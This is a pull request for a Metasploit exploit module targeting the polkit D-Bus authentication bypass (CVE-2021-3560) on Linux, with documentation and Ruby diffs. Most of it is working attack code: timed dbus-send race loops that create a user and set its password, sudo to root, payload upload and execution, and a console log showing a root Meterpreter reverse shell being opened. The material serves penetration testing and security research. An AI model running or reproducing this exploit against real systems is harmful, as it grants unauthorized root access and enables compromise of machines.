### PR TITLE
Polkit D-Bus Authentication Bypass and Privilege Escalation (CVE-2021-3560)

### DIFF
--- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
+++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
@@ -73,6 +73,7 @@ msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
 
 [*] Started reverse TCP handler on 192.168.123.1:4443 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Checking for exploitability via attempt
 [+] The target is vulnerable. The polkit framework instance is vulnerable.
 [*] Attempting to create user msf
 [+] User msf created with UID 1019

--- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
+++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
@@ -1,0 +1,96 @@
+## Description
+
+This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
+The vulnerability enables an unprivileged local user to get a root shell on the system.
+
+## Vulnerable Application
+This module has been tested successfully on:
+    
+* Ubuntu 20.04
+
+### Installation And Setup
+
+Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu.com/download/desktop
+
+## Verification Steps
+1. Start msfconsole.
+2. Get a session.
+3. Do: `use exploit/linux/local/polkit_dbus_auth_bypass`.
+4. Set the `SESSION` to the session obtained in step 2.
+5. Set the `LHOST`, `LPORT` and `PAYLOAD` options as appropriate.
+6. Do: `run`.
+7. It is possible for the exploit to fail, increase the ITERATIONS module option to attempt the exploit more times before failing and run again.
+8. Enjoy the shell.
+
+## Options
+
+**SESSION**
+The session to run this module on.
+
+**WRITABLE_DIR**
+Directory to write file to (`%TEMP%` by default).
+
+**USERNAME**
+The name of the user the exploit will add to the system
+
+**PASSWORD**
+The password for the user to be created
+
+## Scenarios
+
+### Tested on Ubuntu 20.04
+```
+msf6 > use multi/handler
+[*] Using configured payload linux/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 0.0.0.0:4444 
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
+
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use polkit_dbus
+[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
+
+Matching Modules
+================
+
+   #  Name                                         Disclosure Date  Rank       Check  Description
+   -  ----                                         ---------------  ----       -----  -----------
+   0  exploit/linux/local/polkit_dbus_auth_bypass  2021-06-03       excellent  Yes    Polkit Authentication Bypass
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/polkit_dbus_auth_bypass
+
+[*] Using exploit/linux/local/polkit_dbus_auth_bypass
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4443
+lport => 4443
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
+session => 1
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4443 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. The polkit framework instance is vulnerable.
+[*] Attempting to create user msf
+[+] User msf created with UID 1019
+[*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
+[+] Obtained code execution has root!
+[*] Writing '/tmp/vOWnn' (207 bytes) ...
+[*] Sending stage (984904 bytes) to 192.168.123.146
+[+] Deleted /tmp/vOWnn
+[*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
+[*] Attempting to remove the user added: 
+[+] Successfully removed msf
+
+meterpreter > getuid
+Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 192.168.123.146
+OS           : Ubuntu 20.04 (Linux 5.8.0-55-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```

--- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
+++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
@@ -3,9 +3,23 @@
 This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
 The vulnerability enables an unprivileged local user to get a root shell on the system.
 
+This exploit needs be run from an SSH or non-graphical session. The `dbus-send` command which is used to trigger the exploit,
+launches an authentication agent. When run from a graphical session, an authentication agent pops up in the form of a
+dialog box and waits for user input. This dialog box will cause the dbus-command to time out waiting for user input and
+will prevent successful exploitation of polkit
+
+If `systemd` is installed on the system the session service type can be checked by running: `loginctl session-status`. 
+The following output (x11) indicates a graphical session is being run and the exploit will not work:
+
+`Service: gdm-password; type x11; class user`
+
+The following output (tty) indicates a non-graphic session is being used and the exploit is likely to be successful:
+
+`Service: sshd; type tty; class user`
+
 ## Vulnerable Application
 This module has been tested successfully on:
-    
+
 * Ubuntu 20.04
 
 ### Installation And Setup
@@ -19,7 +33,7 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
 4. Set the `SESSION` to the session obtained in step 2.
 5. Set the `LHOST`, `LPORT` and `PAYLOAD` options as appropriate.
 6. Do: `run`.
-7. It is possible for the exploit to fail, increase the ITERATIONS module option to attempt the exploit more times before failing and run again.
+7. It is possible for the exploit to fail. If this happens, increase the value of the ITERATIONS option to attempt the exploit more times before failing and attempt the exploit again.
 8. Enjoy the shell.
 
 ## Options
@@ -44,7 +58,7 @@ msf6 > use multi/handler
 [*] Using configured payload linux/x64/meterpreter_reverse_tcp
 msf6 exploit(multi/handler) > run
 
-[*] Started reverse TCP handler on 0.0.0.0:4444 
+[*] Started reverse TCP handler on 0.0.0.0:4444
 [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
 
 meterpreter > bg
@@ -71,7 +85,7 @@ msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
 session => 1
 msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
 
-[*] Started reverse TCP handler on 192.168.123.1:4443 
+[*] Started reverse TCP handler on 192.168.123.1:4443
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Checking for exploitability via attempt
 [+] The target is vulnerable. The polkit framework instance is vulnerable.
@@ -83,7 +97,7 @@ msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
 [*] Sending stage (984904 bytes) to 192.168.123.146
 [+] Deleted /tmp/vOWnn
 [*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
-[*] Attempting to remove the user added: 
+[*] Attempting to remove the user added:
 [+] Successfully removed msf
 
 meterpreter > getuid

--- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
+++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
+This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
 The vulnerability enables an unprivileged local user to get a root shell on the system.
 
 ## Vulnerable Application
@@ -27,14 +27,14 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
 **SESSION**
 The session to run this module on.
 
-**WRITABLE_DIR**
-Directory to write file to (`%TEMP%` by default).
-
 **USERNAME**
 The name of the user the exploit will add to the system
 
 **PASSWORD**
 The password for the user to be created
+
+**WritableDir**
+Directory to write file to (`%TEMP%` by default).
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
+++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
@@ -8,7 +8,7 @@ launches an authentication agent. When run from a graphical session, an authenti
 dialog box and waits for user input. This dialog box will cause the dbus-command to time out waiting for user input and
 will prevent successful exploitation of polkit
 
-If `systemd` is installed on the system the session service type can be checked by running: `loginctl session-status`. 
+If `systemd` is installed on the system the session service type can be checked by running: `loginctl session-status`.
 The following output (x11) indicates a graphical session is being run and the exploit will not work:
 
 `Service: gdm-password; type x11; class user`
@@ -92,7 +92,7 @@ msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
 [*] Attempting to create user msf
 [+] User msf created with UID 1019
 [*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
-[+] Obtained code execution has root!
+[+] Obtained code execution as root!
 [*] Writing '/tmp/vOWnn' (207 bytes) ...
 [*] Sending stage (984904 bytes) to 192.168.123.146
 [+] Deleted /tmp/vOWnn

--- a/lib/msf/core/post/linux/system.rb
+++ b/lib/msf/core/post/linux/system.rb
@@ -33,11 +33,12 @@ module System
       version = read_file('/etc/system-release').gsub(/\n|\\n|\\l/,'').strip
       if version.include? 'CentOS'
         system_data[:distro] = 'centos'
-        system_data[:version] = version
+      elsif version.include? 'Fedora'
+        system_data[:distro] = 'fedora'
       else
         system_data[:distro] = 'amazon'
-        system_data[:version] = version
       end
+      system_data[:version] = version
 
     # Alpine
     elsif etc_files.include?('alpine-release')

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -120,6 +120,8 @@ Gem::Specification.new do |spec|
   end
   # Gem for handling Cookies
   spec.add_runtime_dependency 'http-cookie'
+   # Needed for some modules (polkit_auth_bypass.rb)
+  spec.add_runtime_dependency 'unix-crypt'
 
   #
   # File Parsing Libraries

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -116,7 +116,14 @@ class MetasploitModule < Msf::Exploit::Local
       print_error("Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}")
       return nil
     end
-    time = time[1].to_f / 2
+
+    time_in_seconds = time[1].to_f
+    # The dbus-send command timeout is implementation-defined, typically 25 seconds
+    # https://dbus.freedesktop.org/doc/dbus-send.1.html#:~:text=25%20seconds
+    if time_in_seconds > datastore['TIMEOUT'].to_f || time_in_seconds > 25.00
+      fail_with(Failure::UnexpectedReply, 'The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being x11 instead of SSH. Please see the module documentation for more information')
+    end
+    time_in_seconds / 2
   end
 
   def check
@@ -124,17 +131,17 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('The polkit framework is not installed.')
     end
 
-    unless cmd_exec('which dbus-send') =~ /dbus-send/
-      return CheckCode::Safe('The dbus-send command is not accessible.')
+    # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
+    # do that, the distro specific package manager would need to be queried. See #check_via_version.
+    polkit_version = Rex::Version.new(Regexp.last_match(1))
+
+    unless cmd_exec('dbus-send -h') =~ /Usage: dbus-send/
+      return CheckCode::Detected('The dbus-send command is not accessible, however the polkit framework is installed.')
     end
 
     # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
     @cmd_delay = get_cmd_delay
     return CheckCode::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?
-
-    # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
-    # do that, the distro specific package manager would need to be queried. See #check_via_version.
-    polkit_version = Rex::Version.new(Regexp.last_match(1))
 
     status = nil
     print_status('Checking for exploitability via attempt')
@@ -359,7 +366,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    fail_with(Failure::NotFound, 'Failed to access /bin/su which this exploit depends on.') unless executable?('/bin/su')
+    fail_with(Failure::NotFound, 'Failed to find the su command which this exploit depends on.') unless command_exists?('su')
+    fail_with(Failure::NotFound, 'Failed to find the dbus-send command which this exploit depends on.') unless command_exists?('dbus-send')
+
+    if @cmd_delay.nil?
+      # cmd_delay wasn't set yet which is needed for the rest of the exploit to operate,
+      # likely cause the check method wasn't executed. Lets set it so long.
+
+      # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
+      @cmd_delay = get_cmd_delay
+      return Failure::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?
+    end
+
     print_status("Attempting to create user #{datastore['USERNAME']}")
     loop_sequence = get_loop_sequence
 

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -116,10 +116,6 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('The polkit framework is not installed.')
     end
 
-    unless executable?('/bin/su')
-      return CheckCode::Safe('This module requires /bin/su which does not seem to be present')
-    end
-
     # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
     @cmd_delay = get_cmd_delay
 
@@ -348,8 +344,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    fail_with(Failure::NotFound, 'Failed to access /bin/su which this exploit depends on.') unless executable?('/bin/su')
     print_status("Attempting to create user #{datastore['USERNAME']}")
     loop_sequence = datastore['ITERATIONS'].times.map(&:to_s).join(' ')
+
     if exploit_set_username(loop_sequence)
       uid = cmd_exec("id -u #{datastore['USERNAME']}")
       print_good("User #{datastore['USERNAME']} created with UID #{uid}")

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -61,19 +61,14 @@ class MetasploitModule < Msf::Exploit::Local
       OptString.new('WRITEABLEDIR', [ true, 'A directory where you can write files.', '/tmp' ]),
       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
       OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
-      OptString.new('CMD_DELAY', [
-        true, 'Amount of time in seconds to let the command to run before killing it.
-This value should be half of the time it takes to run:
-\"time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply
-/org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:<USERNAME> string:"<USERNAME>" int32:1\"', '0.002'
-      ]),
-      OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', '20']),
+      OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
     ])
   end
 
   def exploit_set_realname(new_realname)
+    loop_sequence = datastore['ITERATIONS'].times.map(&:to_s).join(' ')
     cmd_exec(<<~SCRIPT
-      for i in {1..#{datastore['ITERATIONS']}}; do
+      for i in #{loop_sequence}; do
         dbus-send
           --system
           --dest=org.freedesktop.Accounts
@@ -82,7 +77,7 @@ This value should be half of the time it takes to run:
           /org/freedesktop/Accounts/User0
           org.freedesktop.Accounts.User.SetRealName
           string:'#{new_realname}' &
-        sleep 0.004s;
+        sleep #{@cmd_delay};
         kill $!;
         dbus-send
           --system
@@ -102,10 +97,29 @@ This value should be half of the time it takes to run:
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
+  def is_executable?(path)
+    cmd_exec("test -x '#{path}' && echo true").include? 'true'
+  end
+
+  def get_cmd_delay
+    user = rand_text_alphanumeric(8)
+    time_command = "bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\"#{user}\" int32:1'"
+    time = cmd_exec(time_command).match(/real\s+\d+m(\d+.\d+)s/)[1].to_f/2
+    fail_with(Failure::BadConfig, "Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}") unless time
+    time
+  end
+
   def check
     unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
       return CheckCode::Safe('The polkit framework is not installed')
     end
+
+    unless is_executable?('/bin/su')
+      return CheckCode::Safe('This module requires /bin/su which does not seem to be present')
+    end
+
+    # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
+    @cmd_delay = get_cmd_delay
 
     # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
     # do that, the distro specific package manager would need to be queried.
@@ -122,7 +136,7 @@ This value should be half of the time it takes to run:
         if exploit_set_realname(rand_text_alphanumeric(12))
           status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
           unless exploit_set_realname(old_realname)
-            print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
+            print_error('Failed to restore the root user\'s original \'RealName\' property value')
           end
         end
       end
@@ -152,9 +166,9 @@ This value should be half of the time it takes to run:
     UnixCrypt::SHA256.build(datastore['PASSWORD'].to_s)
   end
 
-  def exploit_set_username
+  def exploit_set_username(loop_sequence)
     cmd_exec(<<~SCRIPT
-      for i in {1..#{datastore['ITERATIONS']}}; do
+      for i in #{loop_sequence}; do
         dbus-send
           --system
           --dest=org.freedesktop.Accounts
@@ -162,13 +176,13 @@ This value should be half of the time it takes to run:
           --print-reply
           /org/freedesktop/Accounts
           org.freedesktop.Accounts.CreateUser
-          string:#{datastore['USERNAME']}#{' '}
-          string:\"#{datastore['USERNAME']}\"#{' '}
+          string:#{datastore['USERNAME']}
+          string:\"#{datastore['USERNAME']}\"
           int32:1 &
-        sleep #{datastore['CMDDELAY']}s;
+        sleep #{@cmd_delay}s;
         kill $!;
-        if id #{datastore['USERNAME']}; then#{' '}
-          echo \"success\";#{' '}
+        if id #{datastore['USERNAME']}; then
+          echo \"success\";
           break;
         fi;
       done
@@ -176,29 +190,54 @@ This value should be half of the time it takes to run:
                .gsub(/\s+/, ' ')) =~ /success/
   end
 
-  def exploit_set_password(uid, hashed_password)
+  def exploit_delete_user(uid, loop_sequence)
     cmd_exec(<<~SCRIPT
-      for i in {1..#{datastore['ITERATIONS']}; do
+      for i in #{loop_sequence}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.DeleteUser
+          int64:#{uid}
+          boolean:true &
+        sleep #{@cmd_delay}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then
+          echo \"failed\";
+        else
+          echo \"success\";
+          break;
+        fi;
+      done
+             SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def exploit_set_password(uid, hashed_password, loop_sequence)
+    cmd_exec(<<~SCRIPT
+      for i in #{loop_sequence}; do
         dbus-send#{' '}
           --system
           --dest=org.freedesktop.Accounts
           --type=method_call
-          --print-reply#{' '}
-          /org/freedesktop/Accounts/User#{uid}#{'  '}
-          org.freedesktop.Accounts.User.SetPassword#{' '}
-          string:'#{hashed_password}'#{' '}
-          string: &#{' '}
-        sleep #{datastore['CMDDELAY']}s;
-        kill $!;#{' '}
-        echo #{datastore['PASSWORD']}#{' '}
-        | su - #{datastore['USERNAME']}#{' '}
-        -c \"echo #{datastore['PASSWORD']} | sudo -S id\"#{' '}
-        | grep \"uid=0(root)\";#{' '}
-        if [ $? -eq 0 ]; then#{' '}
+          --print-reply
+          /org/freedesktop/Accounts/User#{uid}
+          org.freedesktop.Accounts.User.SetPassword
+          string:'#{hashed_password}'
+          string: &
+        sleep #{@cmd_delay}s;
+        kill $!;
+        echo #{datastore['PASSWORD']}
+        | su - #{datastore['USERNAME']}
+        -c \"echo #{datastore['PASSWORD']} | sudo -S id\"
+        | grep \"uid=0(root)\";
+        if [ $? -eq 0 ]; then
           echo \"success\";
-          break;#{' '}
+          break;
         fi;
-      done
+      done;
     SCRIPT
                .gsub(/\s+/, ' ')) =~ /success/
   end
@@ -227,28 +266,29 @@ This value should be half of the time it takes to run:
     cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
   end
 
-  # TODO: - use dbus to delete user method
-  def remove_user
-    print_status('Removing the user added: ')
-  end
-
   def exploit
     print_status("Attempting to create user #{datastore['USERNAME']}")
-    if exploit_set_username
+    loop_sequence = datastore['ITERATIONS'].times.map(&:to_s).join(' ')
+    if exploit_set_username(loop_sequence)
       uid = cmd_exec("id -u #{datastore['USERNAME']}")
       print_good("User #{datastore['USERNAME']} created with UID #{uid}")
       print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
-      if exploit_set_password(uid, create_unix_crypt_hash)
+      if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
         print_good('Obtained code execution has root!')
         fname = upload_payload
         execute_payload(fname)
-        # TODO: remove_user
-        remove_user
       else
         fail_with(Failure::BadConfig, "Attempted setting the password #{datastore['Iterations']} times, did not work.")
       end
     else
       fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
+    end
+
+    print_status('Attempting to remove the user added: ')
+    if exploit_delete_user(uid, loop_sequence)
+      print_good("Successfully removed #{datastore['USERNAME']}")
+    else
+      print_warning("Unable to remove user: #{datastore['USERNAME']}, created during the running of this module")
     end
   end
 end

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options([
       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
       OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
-      OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]),
+      OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 30]),
       OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
     ])
     register_advanced_options([
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Local
     time_command = "bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\"#{user}\" int32:1'"
     time = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\s+\d+m(\d+.\d+)s/)
     unless time && time[1]
-      print_error("Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}")
+      print_error("Unable to determine the time taken to run the dbus command, so the exploit cannot continue. Try increasing the TIMEOUT option. The command that failed was: #{time_command}")
       return nil
     end
 
@@ -121,12 +121,17 @@ class MetasploitModule < Msf::Exploit::Local
     # The dbus-send command timeout is implementation-defined, typically 25 seconds
     # https://dbus.freedesktop.org/doc/dbus-send.1.html#:~:text=25%20seconds
     if time_in_seconds > datastore['TIMEOUT'].to_f || time_in_seconds > 25.00
-      fail_with(Failure::UnexpectedReply, 'The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being x11 instead of SSH. Please see the module documentation for more information')
+      print_error('The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being X11 instead of SSH. Please see the module documentation for more information.')
+      return nil
     end
     time_in_seconds / 2
   end
 
   def check
+    if datastore['TIMEOUT'] < 26
+      return CheckCode::Unknown("TIMEOUT is set to less than 26 seconds, so we can't detect if polkit times out or not.")
+    end
+
     unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
       return CheckCode::Safe('The polkit framework is not installed.')
     end
@@ -368,6 +373,9 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     fail_with(Failure::NotFound, 'Failed to find the su command which this exploit depends on.') unless command_exists?('su')
     fail_with(Failure::NotFound, 'Failed to find the dbus-send command which this exploit depends on.') unless command_exists?('dbus-send')
+    if datastore['TIMEOUT'] < 26
+      fail_with(Failure::BadConfig, "TIMEOUT is set to less than 26 seconds, so we can't detect if dbus-send times out or not.")
+    end
 
     if @cmd_delay.nil?
       # cmd_delay wasn't set yet which is needed for the rest of the exploit to operate,
@@ -375,27 +383,23 @@ class MetasploitModule < Msf::Exploit::Local
 
       # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
       @cmd_delay = get_cmd_delay
-      return Failure::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?
+      fail_with(Failure::Unknown, 'Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?
     end
 
     print_status("Attempting to create user #{datastore['USERNAME']}")
     loop_sequence = get_loop_sequence
 
-    if exploit_set_username(loop_sequence)
-      uid = cmd_exec("id -u #{datastore['USERNAME']}")
-      print_good("User #{datastore['USERNAME']} created with UID #{uid}")
-      print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
-      if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
-        print_good('Obtained code execution as root!')
-        fname = upload_payload
-        execute_payload(fname)
-      else
-        print_error("Attempted setting the password #{datastore['Iterations']} times, did not work.")
-      end
+    fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. Try increasing the ITERATIONS amount.") unless exploit_set_username(loop_sequence)
+    uid = cmd_exec("id -u #{datastore['USERNAME']}")
+    print_good("User #{datastore['USERNAME']} created with UID #{uid}")
+    print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+    if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
+      print_good('Obtained code execution as root!')
+      fname = upload_payload
+      execute_payload(fname)
     else
-      print_error("Attempted setting the password #{datastore['Iterations']} times, did not work.")
+      print_error("Attempted to set the password #{datastore['Iterations']} times, did not work.")
     end
-
 
     print_status('Attempting to remove the user added: ')
     if exploit_delete_user(uid, loop_sequence)

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
           ['CVE', '2021-3560'],
-          ['EDB', '50011'],
+          ['EDB', '50011']
         ],
         'Targets' =>
           [
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options([
       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
       OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
-      OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
+      OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
     ])
     register_advanced_options([
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
       if exploit_set_realname(rand_text_alphanumeric(12))
         status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
         unless exploit_set_realname(old_realname)
-          print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
+          print_error('Failed to restore the root user\'s original \'RealName\' property value')
         end
       end
     end
@@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_args << object_path
     cmd_args << interface_member
     args.each do |arg|
-      if arg.is_a? Integer
+      if arg.is_a?(Integer)
         cmd_args << "int32:#{arg}"
-      elsif arg.is_a? String
+      elsif arg.is_a?(String)
         cmd_args << "string:'#{arg}'"
       end
     end
@@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
-    write_file path, data
-    register_file_for_cleanup path
+    print_status("Writing '#{path}' (#{data.size} bytes) ...")
+    rm_f(path)
+    write_file(path, data)
+    register_file_for_cleanup(path)
   end
 
   def upload_and_chmodx(path, data)
-    upload path, data
-    chmod path
+    upload(path, data)
+    chmod(path)
   end
 
   def upload_payload
@@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
     if exploit_set_username(loop_sequence)
       uid = cmd_exec("id -u #{datastore['USERNAME']}")
       print_good("User #{datastore['USERNAME']} created with UID #{uid}")
-      print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+      print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
       if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
         print_good('Obtained code execution has root!')
         fname = upload_payload

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -58,10 +58,12 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options([
-      OptString.new('WRITEABLEDIR', [ true, 'A directory where you can write files.', '/tmp' ]),
       OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
       OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
       OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp/'])
     ])
   end
 

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
-      return CheckCode::Safe('The polkit framework is not installed')
+      return CheckCode::Safe('The polkit framework is not installed.')
     end
 
     unless is_executable?('/bin/su')
